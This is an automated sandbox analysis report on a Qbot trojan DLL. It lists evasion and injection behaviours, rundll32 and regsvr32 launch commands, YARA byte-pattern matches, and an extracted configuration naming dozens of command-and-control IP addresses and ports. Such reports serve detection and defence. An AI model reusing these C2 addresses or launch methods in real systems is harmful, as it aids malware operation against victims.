Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
diatomaceous.dat.dll

Overview

General Information

Sample Name:diatomaceous.dat.dll
Analysis ID:719511
MD5:2e7f90e0c595d88d28f9fd979ccfcf33
SHA1:8ff540ba601429c2ee0a444b0d2ec2650d178d23
SHA256:e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
Tags:dll
Infos:

Detection

Qbot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5992 cmdline: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6116 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 244 cmdline: rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 6096 cmdline: regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 5020 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 3908 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 4860 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 1540 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "BB", "Campaign": "1664535088", "Version": "403.902", "C2 list": ["41.107.71.201:443", "105.101.230.16:443", "105.108.239.60:443", "196.64.227.5:8443", "41.249.158.221:995", "134.35.14.5:443", "113.170.117.251:443", "187.193.219.248:443", "122.166.244.116:443", "154.237.129.123:995", "41.98.229.81:443", "186.48.199.243:995", "102.156.3.13:443", "41.97.190.189:443", "197.207.191.164:443", "105.184.14.132:995", "196.207.146.151:443", "105.158.113.15:443", "196.89.42.89:995", "86.98.156.229:993", "177.174.119.195:32101", "81.156.194.147:2078", "80.253.189.55:443", "197.49.175.67:995", "177.45.78.52:993", "89.187.169.77:443", "196.92.59.242:995", "41.13.200.19:443", "41.97.195.237:443", "92.191.56.11:2222", "154.70.53.202:443", "210.186.37.98:50002"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
    • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_3074a8d4unknownunknown
    • 0x1ba14:$a4: %u;%u;%u;
    • 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1bdd8:$a6: %u&%s&%u
    • 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
      • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.wermgr.exe.e00000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        8.0.wermgr.exe.e00000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
        • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        8.0.wermgr.exe.e00000.0.raw.unpackWindows_Trojan_Qbot_3074a8d4unknownunknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
        • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
        • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        4.2.rundll32.exe.4820000.1.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          4.2.rundll32.exe.4820000.1.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
          • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          Click to see the 61 entries

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Execute DLL with spoofed extension
          Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5992, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, ProcessId: 6116, ProcessName: cmd.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: diatomaceous.dat.dllReversingLabs: Detection: 73%
          Source: diatomaceous.dat.dllVirustotal: Detection: 77%Perma Link
          Source: diatomaceous.dat.dllMetadefender: Detection: 44%Perma Link
          Machine Learning detection for sample
          Source: diatomaceous.dat.dllJoe Sandbox ML: detected
          Source: 8.2.wermgr.exe.e00000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "BB", "Campaign": "1664535088", "Version": "403.902", "C2 list": ["41.107.71.201:443", "105.101.230.16:443", "105.108.239.60:443", "196.64.227.5:8443", "41.249.158.221:995", "134.35.14.5:443", "113.170.117.251:443", "187.193.219.248:443", "122.166.244.116:443", "154.237.129.123:995", "41.98.229.81:443", "186.48.199.243:995", "102.156.3.13:443", "41.97.190.189:443", "197.207.191.164:443", "105.184.14.132:995", "196.207.146.151:443", "105.158.113.15:443", "196.89.42.89:995", "86.98.156.229:993", "177.174.119.195:32101", "81.156.194.147:2078", "80.253.189.55:443", "197.49.175.67:995", "177.45.78.52:993", "89.187.169.77:443", "196.92.59.242:995", "41.13.200.19:443", "41.97.195.237:443", "92.191.56.11:2222", "154.70.53.202:443", "210.186.37.98:50002"]}
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA82E60 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,std::ios_base::_Ios_base_dtor,Concurrency::cancel_current_task,std::ios_base::_Ios_base_dtor,0_2_6DA82E60
          Source: diatomaceous.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: diatomaceous.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA994B5 FindFirstFileExW,0_2_6DA994B5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073C123 FindFirstFileW,FindNextFileW,3_2_0073C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00735D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,3_2_00735D1E

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: diatomaceous.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
